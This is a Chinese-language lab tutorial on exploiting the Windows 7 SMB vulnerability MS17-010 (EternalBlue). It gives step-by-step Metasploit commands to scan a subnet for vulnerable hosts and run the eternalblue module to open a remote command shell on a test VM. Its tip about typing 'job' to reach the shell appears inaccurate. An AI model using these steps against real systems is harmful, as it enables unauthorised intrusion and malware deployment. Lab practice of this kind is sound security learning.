2017 年横卷网络的勒索软件,就是利用了 Windows7 的SMB漏洞,进行传播.
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
以上所说,只是为了提高一下这个 MS17-010 的知名度.
现在利用msfconsole 进行渗透已经是轻车熟路,老生常谈. 但如果你的电脑还没打补丁,还是打上为好,毕竟安全第一.
环境搭建
使用 virtualbox 或者 VMware workstation 分别安装 Kali Linux 和 Windows7 sp1 (原版是没补丁的),桥接网络,便于通信.
笔者的环境是 virtualbox , black arch 和 Windows7 . Windows7得开一下共享,默认是开放445端口的.
blackarch : 192.168.2.106
Windows7 : 192.168.2.107
扫描系统
启动系统
blackarch 默认登录用户名 root , 密码 blackarch .
Windows7 开启共享,这样才会开放445端口.
在 blackarch 中 输入 msfconsole 启动.
扫描漏洞主机
msf5> search ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
可以看到, RHOST 是必须设置的, THREADS 也是必须设置,但是有默认值1了.
msf5 auxiliary(scanner/smb/smb_ms17_010) >set rhosts 192.168.2.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) >set threads 12
msf5 auxiliary(scanner/smb/smb_ms17_010) >run
此处 rhosts 是扫面整个网段, 如果知道目标主机IP 可以使用 IP 直接代替. 例如笔者的是 192.168.2.107.
设置 threads 线程数,可以影响扫描速度. 扫描结果如图:
出现红色描画部分,就说明该主机可能存在漏洞.
渗透攻击
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
可以看到, rhosts 是必须设置的,且默认为空.
msf5 exploit(windows/smb/ms17_010_eternalblue) >set rhosts 192.168.2.107
msf5 exploit(windows/smb/ms17_010_eternalblue) >run
当出现 "command shell session 1 opened" 出现,已经说明渗透成功了.
如果此时还没出现 session ,直接输入 job + 回车 ,即可进入shell.
补充
- 默认安装的Windows7是关闭smb共享的,此时是无法渗透成功的.
- 目标主机是Windows7 简体中文版,所以终端会话是乱码状态,修改一下终端的编码为 GBK 编码即可.
關鍵字: scanner Windows7 auxiliary